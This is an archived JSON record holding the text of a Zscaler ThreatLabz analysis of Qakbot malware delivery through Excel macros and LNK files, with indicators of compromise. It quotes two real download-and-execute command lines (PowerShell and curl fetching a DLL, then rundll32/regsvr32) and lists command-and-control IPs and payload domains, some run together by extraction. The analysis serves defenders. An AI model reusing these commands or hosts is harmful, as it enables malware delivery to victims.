{
	"id": "940befac-3ddc-46fa-9f55-eb57a2d62651",
	"created_at": "2026-04-06T00:09:47.018567Z",
	"updated_at": "2026-04-10T03:24:29.68749Z",
	"deleted_at": null,
	"sha1_hash": "f2307965cd95d3b45f9443322777cb644f7e5ee0",
	"title": "Qakbot Attacks Increasing due to Evolving Threats | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2560703,
	"plain_text": "Qakbot Attacks Increasing due to Evolving Threats | Zscaler\r\nBy Tarun Dewan, Aditya Sharma\r\nPublished: 2022-07-12 · Archived: 2026-04-05 17:40:12 UTC\r\nActive since 2008, Qakbot, also known as QBot, QuackBot and Pinkslipbot, is a common trojan malware\r\ndesigned to steal passwords. This pervasive threat spreads using an email-driven botnet that inserts replies into\r\nactive email threads. Qakbot threat actors are also known to target bank customers and use the access they gain\r\nthrough compromised credentials to spy on financial operations and gather valuable intel.\r\nSummary\r\nQakbot has been a prevalent threat for the past 14 years and continues to evolve, adopting new delivery vectors to\r\nevade detection. Zscaler ThreatLabz has observed a significant uptick in the spread of Qakbot malware over the\r\npast six months using several new techniques. Most recently, threat actors have changed their techniques to\r\nevade detection by using ZIP file extensions, enticing file names in common formats, and Excel 4.0 (XLM) macros to\r\ntrick victims into downloading malicious attachments that install Qakbot. Other, more subtle techniques are being\r\ndeployed by threat actors to prevent automated detection and raise the odds that their attack will work, including\r\nobfuscating code, leveraging multiple URLs to deliver the payload, using unknown file extensions for the\r\npayload, and altering the steps of the process by introducing new layers between initial compromise, delivery,\r\nand final execution.\r\nQakbot is delivered as commonly-named ZIP archive attachments that embed files such as\r\nMicrosoft Office documents, LNK shortcuts, PowerShell scripts, and more. The screenshot in Fig. 
1 below reveals a snapshot view of the\r\nspikes in Qakbot activity observed over the past six months.\r\nFigure 1: Qakbot activity monitored during the last 6 months by Zscaler ThreatLabz\r\nZscaler automatically identifies and blocks files containing Qakbot malware for our customers, and provides them\r\nwith the best possible solution to manage this evolving threat.\r\nAs an extra precaution against these types of threats, Zscaler recommends that organizations formally train users\r\nnot to open email attachments sent from untrusted or unknown sources and encourage users to verify URLs in\r\ntheir browser address bar before entering credentials.\r\nThe Zscaler ThreatLabz team will continue to monitor this campaign, as well as others, to help keep our customers\r\nsafe and share critical information with the larger SecOps community to help stop the spread of active threats like\r\nQakbot and protect people everywhere. The following sections dive into an in-depth analysis of this evolving\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 1 of 20\n\nthreat and provide actionable indicators that security professionals can apply to identify and block Qakbot in their\r\nenvironments.\r\nTechnical analysis of evolving Qakbot techniques\r\nThreatLabz has observed threat actors using various file names to disguise attachments designed to\r\ndeliver Qakbot. Using common file naming formats that include a description, generated numbers, and dates, the\r\nfiles feature common keywords for finance and business operations, including compensation figures, metric\r\nreports, invoices and other enticing datasets. To the unsuspecting victim, these types of files may appear either as\r\neveryday business-as-usual items or as a rare opportunity to look at data they would not normally see. 
Either\r\nway, the victim is likely to fall for the sense of urgency of a fresh data set or request and click the file to learn\r\nmore about what is inside and how it pertains to them.\r\nMalicious file name examples:\r\nCalculation-1517599969-Jan-24.xlsb\r\nCalculation-Letter-1179175942-Jan-25.xlsb\r\nClaimDetails-1312905553-Mar-14.xlsb\r\nCompensation-1172258432-Feb-16.xlsb\r\nCompliance-Report-1634724067-Mar-22.xlsb\r\nContractCopy-1649787354-Dec-21.xlsb\r\nDocumentIndex-174553751-12232021.xlsb\r\nEmergReport-273298556-20220309.xlsb\r\nPayment-1553554741-Feb-24.xlsb\r\nReservationDetails-313219689-Dec-08.xlsb\r\nService-Interrupt-977762469.xlsb\r\nSummary-1318554386-Dec27.xlsb\r\nAnalyzing the de-obfuscated code exposes how these malicious attachments use XLM 4.0 to hide their macros\r\nand evade detection by static analysis tools and automated sandboxes. Looking back over the past six months, our\r\nresearchers observed a distinct set of email templates and standardized Office templates that are reused with\r\nonly slight changes in nearly all of the analyzed Qakbot samples. 
\r\nEmail Templates:\r\nFigure 2: Standard email and Office templates used for Qakbot delivery in the last six months\r\nThe following section provides a month-by-month overview of changes observed in Qakbot samples from\r\nDecember 2021 - May 2022:\r\nAttack Chain\r\nFigure 3: Diagram of Qakbot delivery and execution via Microsoft Office attachments\r\nDecember 2021: Qakbot XLM 4.0 snippet [Md5: 58F76FA1C0147D4142BFE543585B583F]\r\nOnce the user clicks “Enable Content” to view the attachment, the macro is activated and looks for a subroutine with\r\na pre-defined name, in this case starting with auto_open777777. In the next step of the sequence, the\r\nURLDownloadToFile function is imported and called to download the malicious Qakbot payload and drop it into\r\nthe C:\\ProgramData\\ location on the victim’s machine with a .OCX extension, although the file is actually the Qakbot DLL.\r\nThen the WinAPI EXEC call from Excel4Macro directly executes the malicious payload or loads it using\r\nregsvr32.exe.\r\nFigure 4: Qakbot XLM 4.0 snippet from December 2021\r\nJanuary 2022: Qakbot XLM 4.0 snippet [Md5: 4DFF0479A285DECA19BC48DFF2476123]\r\nThe following snippet executes macro code stored in the cells of a hidden sheet named\r\n‘EFFWFWFW’. It uses REGISTER to import functions and calls them in sequence; in this\r\nexample the threat actor has added obfuscation to the same actions to avoid detection. 
\r\nFigure 5: Qakbot XLM 4.0 snippet from January 2022\r\nFebruary 2022: Qakbot XLM 4.0 snippet [Md5: D7C3ED4D29199F388CE93E567A3D45F9]\r\nThe malware author left the code mostly unmodified. It creates a folder using the CreateDirectoryA WinAPI, as shown\r\nin the following snapshot: “C:\\Biloa”.\r\nFigure 6: Qakbot XLM 4.0 snippet from February 2022\r\nMarch 2022: Qakbot XLM 4.0 snippet [Md5: 3243D439F8B0B4A58478DFA34C3C42C7]\r\nObserved a change in the file system persistence location.\r\nThe payload drop location changed from C:\\ProgramData\\ to C:\\Users\\User\\AppData\\Local\\\r\n[random_folder_name]\\random.dll.\r\nLess obfuscation; the code is much more readable.\r\nThe -s option is used with regsvr32.exe so that the DLL is registered silently without displaying any prompt.\r\nFigure 7: Qakbot XLM 4.0 snippet from March 2022\r\nApril 2022: XLM 4.0 snippet [Md5: 396C770E50CBAD0D9779969361754D69]\r\nA new change is the observation of fully de-obfuscated code in Qakbot attachments. A similarity observed across\r\nQakbot variants is the use of multiple URLs that can deliver the malicious payload, so that if any one URL goes\r\ndown or is blocked, the payload can still be delivered from another available URL. Additionally, it is common\r\nto see threat actors trying to evade detection by automated security scans by using unknown extensions on\r\ndropped payloads such as OCX, ooccxx, .dat, .gyp, and more.\r\nFigure 8: Qakbot XLM 4.0 snippet from April 2022\r\nMay 2022: Qakbot XLM 4.0 snippet [Md5: C2B1D2E90D4C468685084A65FFEE600E]\r\nObserved a change in the dropped filename to the pattern [0-9]{2,5}\\.[0-9]{4,12}\\.dat. 
Additionally, instead of 4-5 different payload\r\ndownload URLs, only one Qakbot download URL is identified.\r\nFigure 9: Qakbot XLM 4.0 snippet from May 2022\r\nFigure 10: Zscaler Sandbox report of Qakbot delivered by a malicious Office attachment\r\nSpreading factor through LNK files:\r\nAttack Chain\r\nFigure 11: Qakbot delivery and execution through LNK file\r\na) May 2022: Qakbot snippet of LNK file\r\nObserved an increase in the use of the LNK shortcut file type with names like:\r\nreport[0-9]{3}\\.lnk\r\nreport228.lnk\r\nreport224.lnk\r\nObserved a change to using powershell.exe to download the malware payload.\r\nObserved a change, and a clear sign of Qakbot evolving to evade updated security practices and defenses, in loading\r\nthe DLL payload through rundll32.exe instead of regsvr32.exe.\r\nArgument: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit iwr -Uri\r\nhttps://oleitikocottages.com/r4i9PRpVt/S.png -OutFile $env:TEMP\\766.dll;Start-Process rundll32.exe\r\n$env:TEMP\\766.dll,NhndoMnhdfdf\r\nb) June 2022: Qakbot snippet of LNK file\r\nObserved changes in both the execution flow and the file naming for the LNK file type. 
Regsvr32.exe is used\r\nto load the Qakbot DLL, which also injects into explorer.exe for communication with the command and control server.\r\nObserved file names using the 5[0-9]{7,10}_[0-9]{6,8}\\.lnk pattern for the LNK file type:\r\n51944395538_1921490797.zip\r\n52010712629_1985757123.zip\r\n52135924228_164908202.zip\r\n51107204327_175134583.zip\r\nArgument: 'C:\\Windows\\system32\\cmd.exe C:\\Windows\\System32\\cmd.exe /q /c echo 'HRTDGR' \u0026\u0026 MD\r\n\"%ProgramData%\\Username\" \u0026\u0026 curl.exe -o %ProgramData%\\Username\\filename.pos\r\n91.234.254.106/%random%.dat \u0026\u0026 ping -n 2 localhost \u0026\u0026 echo \"MERgd\" \u0026\u0026 echo \"NRfd\" \u0026\u0026 regsvr32\r\n'C:\\ProgramData\\Username\\filename.pos'\r\nVia the command prompt it downloads the payload with a curl\r\ncommand and drops the file on the victim’s machine. The switches used in the observed command are:\r\nCMD.EXE:\r\n/q : Turns the echo off.\r\n/c : Carries out the command specified by the string and then stops.\r\nCURL.EXE:\r\n-o : Write output to file\r\nAfter that it loads the downloaded DLL payload through regsvr32.exe and injects into explorer.exe. 
Then\r\nit performs further operations, including:\r\nChecks for the presence of antivirus software.\r\nCreates a RUN key for persistence in the system.\r\nCreates scheduled tasks to execute the payload at a specific time.\r\nFigure 12: Zscaler Sandbox report of Qakbot delivered by LNK\r\nMore details on these findings are covered in the ThreatLabz Qakbot vectors blog.\r\nDownloaded Qakbot DLL: 529fb9186fa6e45fd4b7d2798c7c553c, from the above-mentioned LNK file.\r\nThe entry point of the executable is fully obfuscated using duplicate MOV operations.\r\nFigure 13: Obfuscated entry point\r\nThe following screenshot shows junk code obfuscating the routine used to decode the payload.\r\nFigure 14: Code snippet for decoding the payload\r\nThe sample checks for Windows Defender emulation by calling the GetFileAttributes WinAPI on “C:\\INTERNAL\\__empty”.\r\nFigure 15: Payload checking GetFileAttributesW\r\nThe sample also uses some flags like SELF_TEST_1 which appear to be for debugging purposes. 
\r\nFigure 16: Setting a flag for debugging purposes\r\nFigure 17: Zscaler Sandbox report for Qakbot DLL\r\nZscaler's multilayered cloud security platform detects indicators, as shown below:\r\nLNK.Downloader.Qakbot\r\nVBA.Downloader.Qakbot\r\nThe following details were extracted from the Qakbot configuration of the sample we examined, which connects to the server\r\nthrough explorer.exe.\r\nBOTNET ID: Obama188\r\n[+] C2 IPs:\r\n1.161.123.53\r\n101.108.199.194\r\n102.182.232.3\r\n103.116.178.85\r\n103.207.85.38\r\n104.34.212.7\r\n106.51.48.170\r\n108.60.213.141\r\n109.12.111.14\r\n109.178.178.110\r\n111.125.245.116\r\n117.248.109.38:21\r\n120.150.218.241\r\n120.61.2.215\r\n121.7.223.45\r\n124.40.244.115\r\n140.82.49.12\r\n140.82.63.183\r\n143.0.219.6\r\n144.202.2.175\r\n144.202.3.39\r\n148.0.56.63\r\n148.64.96.100\r\n149.28.238.199\r\n172.115.177.204\r\n173.174.216.62\r\n173.21.10.71\r\n174.69.215.101\r\n175.145.235.37\r\n176.205.23.48\r\n176.67.56.94\r\n177.209.202.242\r\n177.94.57.126\r\n179.158.105.44\r\n180.129.108.214\r\n182.191.92.203\r\n186.90.153.162\r\n187.207.131.50\r\n187.251.132.144\r\n189.146.87.77\r\n189.223.102.22\r\n189.253.206.105\r\n189.37.80.240\r\n189.78.107.163\r\n190.252.242.69\r\n191.112.4.17\r\n191.34.120.8\r\n193.136.1.58\r\n196.203.37.215\r\n197.87.182.115\r\n197.94.94.206\r\n201.145.165.25\r\n201.172.23.68\r\n201.242.175.29\r\n208.101.82.0\r\n208.107.221.224\r\n210.246.4.69\r\nIndicators of Compromise\r\n[+] Payload 
URLs:\r\nanukulvivah.comnobeltech[.]com.pk\r\ngriffinsinternationalschool.intierrasdecuyo[.]com.ar\r\ntajir[.]comdocumentostelsen[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 14 of 20\n\nwrcopias[.]com.brls[.]com.co\r\ndk-chic[.]combendhardwoodflooring[.]com\r\nstalwartnv[.]comdelartico[.]com\r\nnewportresearchassociates[.]comjindalfabtex[.]com\r\nsoftwarela.orgasesorescontables[.]com.py\r\nsegurabr[.]com.brrenty.biz\r\nhams.psalrabbat[.]com\r\nglistenworld[.]comsonalifecare[.]com\r\nact4dem.netbrandxo.in\r\nstuttgartmed[.]comgmstrust.in\r\nact4dem.netglistenworld[.]com\r\nananastours[.]comhostingdeguatemala[.]com\r\ngmsss45c[.]comasiatrendsmfg[.]com\r\nfacturamorelos[.]comjnpowerbatteries[.]com\r\nminimean[.]com1031taxfreexchange[.]com\r\npbxebike[.]comhigradeautoparts[.]com\r\nparkbrightworldwideltd[.]comams.org.co\r\nbaalajiinfotechs[.]commomoverslegypte[.]com\r\nrecetasparaelalmapanama[.]comghssarangpur.org\r\nwecarepetz[.]com.brbrothersasian[.]com\r\nknapppizzabk[.]comwecarepetz[.]com.br\r\njeovajirelocacao[.]com.br7n7u.tk\r\namdpl.indabontechnologies.co.ke\r\nbouncehouserentalmiami.netmahasewanavimumbai[.]com\r\nhotelsinshillong.inbrothersasian[.]com\r\ntamiltechhints[.]comitaw-int[.]com\r\ntvtopcultura[.]com.brmadarasapattinam[.]com\r\ndesue.mxautocadbeginner[.]com\r\nantwerpdiamond.netmarciomazeu.dev.br\r\nifongeek[.]comtunaranjadigital[.]com\r\navaniamore[.]comthecoursecreators[.]com\r\nthecoursecreators[.]comdrishyamopticals[.]com\r\nthewebinarchallenge[.]comiammyprioritylive[.]com\r\nerekha.invegascraftbeertour[.]com\r\nrommify.orgpbsl[.]com.gh\r\nsathyaunarsabha.orgcourtalamarivuthirukovil.org\r\npbsl[.]com.ghapk.hap.in\r\noutsourcingmr[.]comofferlele[.]com\r\ncourtalamarivuthirukovil.orgelchurritorojas[.]com\r\napk.hap.inklicc.co.tz\r\njinglebells.ngthebrarscafe[.]com\r\nbigtv3d.inretroexcavaciones[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced
-evolving-threat-techniques\r\nPage 15 of 20\n\naimwithnidhi.invizionsconsulting[.]com\r\ngaurenz[.]comamarelogema[.]com.br\r\nwiredcampus.inretroexcavaciones[.]com\r\nelchurritorojas[.]comglobalwomenssummit2020[.]com\r\nbyonyks[.]comwfgproduction[.]com\r\nwfgproduction[.]comciit.edu.ph\r\nreachprofits[.]comcreativecanvas.co.in\r\nvegascraftbeertour[.]comnightsclub[.]com\r\nassistenciatecnicaembh24h[.]com.brtheinfluencersummit2021[.]com\r\ngrupoumbrella[.]com.brbjfibra[.]com\r\nfra[.]com.arthewebinarstore[.]com\r\nwriteright.inaaafilador.eu\r\nwlrinformatica[.]com.brminahventures[.]com\r\nalternativecareers.inwvquali[.]com.br\r\naaafilador.eueventbriteclone.xyz\r\npolicepublicpress.inmarcofoods.in\r\nlongwood-pestcontrol[.]comlifecraze.in\r\nviasalud.mxecsshipping[.]com\r\nmisteriosdeldesierto.pelgfcontabilidade[.]com.br\r\nmariebeeacademy[.]commuthumobiles[.]com\r\nteamone[.]com.satechmahesh.in\r\nwiredcampus.inteamone[.]com.sa\r\nfurnitureion[.]comekofootball[.]com\r\ncomunidadecristaresgate[.]com.bryqsigo[.]com\r\nmysuccesspoint.inkriworld.net\r\nwiredcampus.intheinfluencerlaunch[.]com\r\nmi24securetech[.]compalconsulting.net\r\nattalian[.]comrudrafasteners[.]com\r\nfilmandtelevisionindia[.]comcloudberrie[.]com\r\nbrikomechanical[.]comideiasnopapel[.]com.br\r\nneovation.sgatozinstrument[.]com\r\ntecnobros8[.]comwalnut.ae\r\nbrikomechanical[.]comleaoagronegocios[.]com.br\r\nsonhomirim[.]com.brwlrinformatica[.]com.br\r\nwbbvet.ac.inboostabrain.in\r\nnarendesigns[.]comsla[.]com.ng\r\nrstkd[.]com.brdelacumbrefm[.]com\r\nleaoagronegocios[.]com.brdegreesdontmatter.in\r\nstrategicalliances.co.inlelokobranding.co.za\r\nmetrointl.netrajkotbusiness.in\r\ntitanhub.co.ukgrupothal[.]com.br\r\nwww.centerplastic[.]com.brpawnest[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 16 of 
20\n\nrightsupportmanagement.co.uksmiletours.net\r\nleaseicemachine[.]comsegiaviamentos[.]com.br\r\nvirtualexpo.cactusfuturetech[.]comautovidriosrobin.anuncio-ads.cl\r\nklearning.co.ukbestbuidan.mn\r\namicodelverde[.]comhunbuzz[.]com\r\nprova.gaia.srlprodotti.curadelprato[.]com\r\nprodotti.curadelprato[.]comdomenico[.]com.co\r\nanukulvivah[.]comahmedabadpolicestories[.]com\r\nec.meticulux.netpent.meticulux.net\r\nclerbypestcontrolllp.inorderingg.in\r\nrylanderrichter[.]comtajir[.]com\r\nsearchgeo.org4md-uae[.]com\r\nmatjarialmomayz[.]comformularapida[.]com.br\r\ncarnesecaelpatron[.]com.mxbengallabourunion[.]com\r\nalphanett[.]com.brragvision[.]com\r\nsecunets.co.keflameburger[.]com.mx\r\ngph.lkabingdonhomes[.]com\r\nagteacherscollege.ac.insis.edu.gh\r\nimpexlanka[.]comludoi[.]come.xyz\r\nmufinacademy[.]com1031oilgasexchange[.]com\r\nindexpublicidade[.]com.brhullriverinternationalltd[.]com\r\nsrgsdelhiwest[.]comproyectostam[.]com\r\nwaitthouseinc.orggomax.mv\r\necotence.in.nettriplenetleaseproperty[.]com\r\nbrunocesar.meonlywebsitemaintenance[.]com\r\nlbconsultores[.]com.cokindersaurus.in\r\nguitarconnectionsg[.]comguestpostmachine[.]com\r\nbagatiparamohiladegreecollege.edu.bdguitarconnectionsg[.]com\r\nwaitthouseinc.orgofferlele[.]com\r\ncuddlethypet[.]comsrimanthexports[.]com\r\nespetinhodotom[.]comluxiaafinishinglab[.]com\r\ngreyter[.]commoodle-on[.]com\r\nniramayacare.inmakazadpharmacy[.]com\r\nnetleasesale[.]comnathanflax[.]com\r\nerimaegypt[.]comclashminiwiki[.]com\r\ntopfivedubai[.]comskyorder.net\r\nprofitsbrewingnews[.]commotobi[.]com.bd\r\npolistirolo.orgpalashinternationals[.]com\r\nmayaconstructions.co.inmaexbrasil[.]com.br\r\nmzdartworkservicesllc[.]comwalmondgroup[.]com\r\nsaffroneduworld[.]comlacremaynaty[.]com.mx\r\nifongeek[.]comgrowscaleandprofit[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 17 of 
20\n\ngetishdonelive[.]cominfluencerlaunches[.]com\r\napk.hap.incalldekesha[.]com\r\nvortex.cmspeakatiamp[.]com\r\nthewebinarclinic[.]comthewebinarchecklist[.]com\r\nsathyaunarsabha.orgoutsourcingmr[.]com\r\nwebdoweb[.]com.ngvortex.cm\r\nfuture-vision[.]com.trbrunalipiani[.]com.br\r\necotence.xyznimbus[.]com.qa\r\nwriteright.inlightnco.id\r\naidshivawareness.orgmetaunlimited.in\r\nhearingaidbihar[.]combarcalifa[.]com.br\r\ncondominiosanalfonso.cltimelapse.ae\r\noladobeldavida[.]com.brmarcofoods.in\r\nalternativecareers.inrsbnq[.]com\r\ncobblux.pktafonego.org\r\nchezmarblan[.]comcogitosoftware.co.in\r\ndevconstech[.]comcumipilek[.]com\r\ndaptec[.]com.brhydrical.mx\r\nindiacodecafe[.]comecsshipping[.]com\r\nskyorder.nettechmahesh.in\r\nassimpresaroma.itcampandvillas[.]com\r\nstyleavail[.]comomtapovan[.]com\r\nprogramandoavida[.]com.brindiacodecafe[.]com\r\nbruno-music[.]comlaoaseanhospital.la\r\nagbegypt[.]comcrimpwell.in\r\n1031wiki[.]comstrategicalliances.co.in\r\nnimbus[.]com.qavivanaweb[.]com.br\r\nofficeservicesjo.cfdinspiraanalytics.in\r\nshareyourcake.orgprotocolostart[.]com\r\nacertoinformatica[.]com.brinovex.in\r\ndevconstech[.]comdigizen.in\r\nrajkotbusiness.indigizen.in\r\nacertoinformatica[.]com.brrumbakids[.]com\r\nboostabrain.incsnglobal.co\r\nhaskekudla[.]comkraushop[.]com\r\nMahalaxmibastralayanx.inchuckdukas[.]com\r\n[+] Hashes\r\nXLSB:\r\n58F76FA1C0147D4142BFE543585B583F\r\n4DFF0479A285DECA19BC48DFF2476123\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 18 of 20\n\nD7C3ED4D29199F388CE93E567A3D45F9\r\n3243D439F8B0B4A58478DFA34C3C42C7\r\n396C770E50CBAD0D9779969361754D69\r\nC2B1D2E90D4C468685084A65FFEE600E\r\nLNK:\r\n54A10B41A7B12233D0C9EACD11036954\r\nE134136D442A5C16465D9D7E8AFB5EBE\r\n7D0083DB5FA7DE50E620844D34C89EFC\r\nC2663FCCB541E8B5DAA390B76731CEDE\r\nQakbot:\r\n529FB9186FA6E45FD4B7D2798C7C553C\r\n[+] 
Filenames:\r\nCalculation-1517599969-Jan-24.xlsb\r\nCalculation-Letter-1179175942-Jan-25.xlsb\r\nClaimDetails-1312905553-Mar-14.xlsb\r\nCompensation-1172258432-Feb-16.xlsb\r\nCompliance-Report-1634724067-Mar-22.xlsb\r\nContractCopy-1649787354-Dec-21.xlsb\r\nDocumentIndex-174553751-12232021.xlsb\r\nEmergReport-273298556-20220309.xlsb\r\nPayment-1553554741-Feb-24.xlsb\r\nReservationDetails-313219689-Dec-08.xlsb\r\nService-Interrupt-977762469.xlsb\r\nSummary-1318554386-Dec27.xlsb\r\nW_3122987804.xlsb\r\nA_1722190090.xlsb\r\nAO_546764894.xlsb\r\nNh_1813197697.xlsb\r\nLM_4170692805.xlsb\r\nreport228.lnk\r\nreport224.lnk\r\n51944395538_1921490797.zip\r\n52010712629_1985757123.zip\r\n52135924228_164908202.zip\r\n51107204327_175134583.zip\r\nSource: https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques"
	],
	"report_names": [
		"rise-qakbot-attacks-traced-evolving-threat-techniques"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434187,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.pdf",
		"text": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.txt",
		"img": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.jpg"
	}
}